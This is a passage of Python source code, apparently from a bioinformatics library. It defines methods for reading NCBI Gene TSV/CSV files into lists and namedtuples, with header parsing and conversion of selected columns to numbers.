self.log = kwargs_dict.get('log', sys.stdout)
self.int_hdrs = [
'tax_id', 'GeneID', 'CurrentID', # NCBI Gene
'start_position_on_the_genomic_accession', # NCBI Gene
'end_position_on_the_genomic_accession', # NCBI Gene
'exon_count', # NCBI Gene
'Start', 'start', 'End', 'end', # Cluster
'Len', 'len', 'Length', 'length', # cluster
'Qty', 'qty', '# Genes'] # Cluster
if 'ints' in kwargs_dict:
ints = kwargs_dict['ints']
if ints:
self.int_hdrs.extend(ints)
else:
self.int_hdrs = []
self.float_hdrs = ['Density', 'density', 'MinDensity'] # Cluster
# These are formated for expected sorting: eg. Chr "09", "10"
self.strpat_hdrs = {'Chr':'{:>2}', 'chromosome':'{:>2}'}
if 'floats' in kwargs_dict:
self.float_hdrs.extend(kwargs_dict['floats'])
self.idxs_float = [] # run() inits proper values
self.idxs_int = [] # run() inits proper values
self.idxs_strpat = [] # run() inits proper values
# Data Members used by all functions
self.fin = fin
self.hdr2idx = None
self.len = 0
self.sep = self._get_sep(fin, sep)
self.hdr_ex = kwargs_dict.get('hdr_ex', None)
# Data Members used by various functions
self.ret_list = [] # tbl2list
self.hdrs_usr = [] # tbl2sublist tbl2list
self.usr_max_idx = None
# list: Return the one item (a list of items) of interest to the user.
# sublist: Return the items (a list of lists) of interest to the user.
# lists: Return all items (a list of lists) read from the tsv/csv file.
self.fncs = {
'list': lambda fld: self.ret_list.extend([fld[hdr_i[1]] for hdr_i in self.hdrs_usr]),
'sublist': lambda fld: self.ret_list.append([fld[hdr_i[1]] for hdr_i in self.hdrs_usr]),
'lists': lambda fld: self.ret_list.append(fld)
}
def get_h2i(self, hdrs_usr):
"""Read csv/tsv file and return specified data in a list of lists."""
with open(self.fin) as fin_stream:
for line in fin_stream:
line = line.rstrip('\r\n') # chomp
if not self.hdr2idx:
if self.do_hdr(line, hdrs_usr):
return self.hdr2idx
return None
def do_hdr(self, line, hdrs_usr):
"""Initialize self.h2i."""
# If there is no header hint, consider the first line the header.
if self.hdr_ex is None:
self._init_hdr(line, hdrs_usr)
return True
# If there is a header hint, examine each beginning line until header hint is found.
if self.hdr_ex in line:
self._init_hdr(line, hdrs_usr)
return True
return False
def run(self, fnc_name, hdrs_usr):
"""Read csv/tsv file and return specified data in a list of lists."""
fnc = self.fncs[fnc_name]
with open(self.fin) as fin_stream:
for lnum, line in enumerate(fin_stream):
line = line.rstrip('\r\n') # chomp
# Obtain Data if headers have been collected from the first line
if self.hdr2idx:
self._init_data_line(fnc, lnum, line)
# Obtain the header
else:
self.do_hdr(line, hdrs_usr)
if self.log is not None:
self.log.write(" {:10,} data READ: {}\n".format(len(self.ret_list), self.fin))
return self.ret_list, self.hdr2idx
def get_nts(self):
"""Read csv/tsv file and return specified data in a list of lists."""
data = []
nt_obj = None
with open(self.fin) as fin_stream:
for lnum, line in enumerate(fin_stream, 1):
try:
line = line.rstrip('\r\n') # chomp
# Obtain Data if headers have been collected from the first line
if nt_obj is not None:
flds = re.split(self.sep, line)
self.convert_ints_floats(flds)
# Aliases
flds[6] = self._get_list(flds[6])
flds[16] = [int(s) for s in self._get_list(flds[16])]
ntdata = nt_obj._make(flds)
data.append(ntdata)
# Obtain the header
else:
nt_obj = self._init_nt_hdr(line)
except RuntimeError:
# Print headers
#if nt_obj is not None:
# sys.stdout.write("{HDRS}\n".format(HDRS='\n'.join(nt_obj._fields)))
flds = re.split(self.sep, line)
print(len(flds), "FIELDS")
print(flds)
#raise Exception("{FIN}({LNUM}): {LINE}\n".format(
# FIN=self.fin, LNUM=lnum, LINE=line))
# JUST SKIP LINES WITH INCOMPLETE DATA, BUT PRINT ERROR MESSAGE
sys.stdout.write("**ERROR: {FIN}({LNUM}): {LINE}\n".format(
FIN=self.fin, LNUM=lnum, LINE=line))
if self.log is not None:
self.log.write(" {:10,} lines READ: {}\n".format(len(data), self.fin))
return data
@staticmethod
def _get_list(valstr):
"""Return a list, given a string containing a list of values"""
return [] if valstr == '' else [s.strip() for s in valstr.split(',')]
def hdr_xform(self, hdrs):
"""Transform NCBI Gene header fields into valid namedtuple fields."""
xform = []
hdrs = self.replace_nulls(hdrs)
for hdr in hdrs:
hdr = hdr.replace('.', '_')
hdr = hdr.replace(' ', '_')
hdr = hdr.replace('#', 'N')
hdr = hdr.replace('-', '_')
hdr = hdr.replace('"', '')
xform.append(hdr)
return xform
def _init_nt_hdr(self, line):
"""Convert headers into valid namedtuple fields."""
line = line.replace('.', '_')
line = line.replace(' ', '_')
line = line.replace('#', 'N')
line = line.replace('-', '_')
line = line.replace('"', '')
#line = re.sub(r"_$", r"", line)
hdrs = re.split(self.sep, line)
if '' in hdrs:
hdrs = NCBIgeneFileReader.replace_nulls(hdrs)
# Init indexes which will be converted to int or float
self.idxs_int = [idx for idx, hdr in enumerate(hdrs) if hdr in self.int_hdrs]
self.idxs_float = [idx for idx, hdr in enumerate(hdrs) if hdr in self.float_hdrs]
if hdrs[6] != 'Aliases':
raise RuntimeError('**FATAL: BAD HEADER LINE: {LINE}'.format(LINE=line))
return namedtuple('ntncbi', ' '.join(hdrs))
@staticmethod
def _get_sep(fin, sep):
"""Uses extension(.tsv, .csv) to determine separator."""
if '.tsv' in fin:
return r'\t'
if '.csv' in fin:
return r','
return sep
@staticmethod
def replace_nulls(hdrs):
"""Replace '' in hdrs."""
ret = []
idx = 0
for hdr in hdrs:
if hdr == '':
ret.append("no_hdr{}".format(idx))
else:
ret.append(hdr)
return ret
def _init_data_line(self, fnc, lnum, line):
"""Process Data line."""
fld = re.split(self.sep, line)
# Lines may contain different numbers of items.
# The line should have all columns requested by the user.
if self.usr_max_idx < len(fld):
self.convert_ints_floats(fld)
fnc(fld)
else:
for fld in enumerate(zip(self.hdr2idx.keys(), fld)):
print(fld)
for hdr in self.hdrs_usr:
print(hdr)
print('# ITEMS ON A LINE:', len(fld))
print('MAX USR IDX:', self.usr_max_idx)
raise Exception("ERROR ON LINE {} IN {}".format(lnum+1, self.fin))
def convert_ints_floats(self, flds):
"""Convert strings to ints and floats, if so specified."""
for idx in self.idxs_float:
flds[idx] = float(flds[idx])
for idx in self.idxs_int:
dig = flds[idx]
#print 'idx={} ({}) {}'.format(idx, flds[idx], flds) # DVK
flds[idx] = int(flds[idx]) if dig.isdigit() else dig
for idx in self.idxs_strpat:
hdr = self.hdr2idx.items()[idx][0]
pat = self.strpat_hdrs[hdr]
flds[idx] = pat.format(flds[idx])
def _init_hdr(self, line, hdrs_usr):
"""Initialize self.hdr2idx, self.len, self.idxs_float, and self.idxs_int"""
self.hdr2idx = OrderedDict([(v.strip(), i) for i, v in enumerate(re.split(self.sep, line))])
self.len = len(self.hdr2idx)
# If user is requesting specific data fields...
if hdrs_usr is not None:
# Loop through the user headers
for usr_hdr in hdrs_usr:
# If the user header is contained in the file....
if usr_hdr in self.hdr2idx:
# Add the user header and the field index to a list
self.hdrs_usr.append([usr_hdr, self.hdr2idx[usr_hdr]])
else:
raise Exception("NO COLUMN({}) FOUND:\n HDR={}\n".format(
hdrs_usr, '\n HDR='.join(self.hdr2idx.keys())))
usr_hdrs = [E[0] for E in self.hdrs_usr] if self.hdrs_usr else self.hdr2idx
self._init_idxs_float(usr_hdrs)
self._init_idxs_int(usr_hdrs)
self._init_idxs_strpat(usr_hdrs)
self.usr_max_idx = max(E[1] for E in self.hdrs_usr) if self.hdrs_usr else len(self.hdr2idx)-1
def _init_idxs_float(self, usr_hdrs):
"""List of indexes whose values will be floats."""
self.idxs_float = [
Idx for Hdr, Idx in self.hdr2idx.items() if Hdr in usr_hdrs and Hdr in self.float_hdrs]
def _init_idxs_int(self, usr_hdrs):
"""List of indexes whose values will be ints."""
self.idxs_int = [
Idx for Hdr, Idx in self.hdr2idx.items() if Hdr in usr_hdrs and Hdr in self.int_hdrs]
def _init_idxs_strpat(self, usr_hdrs):
"""List of indexes whose values will be strings."""
strpat = self.strpat_hdrs.keys()
self.idxs_strpat = [
Idx for Hdr, Idx in self.hdr2idx.items() if Hdr in usr_hdrs and Hdr in strpat]
# Copyright (C) 2016-present, DV Klopfenstein, H Tang, All rights reserved.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.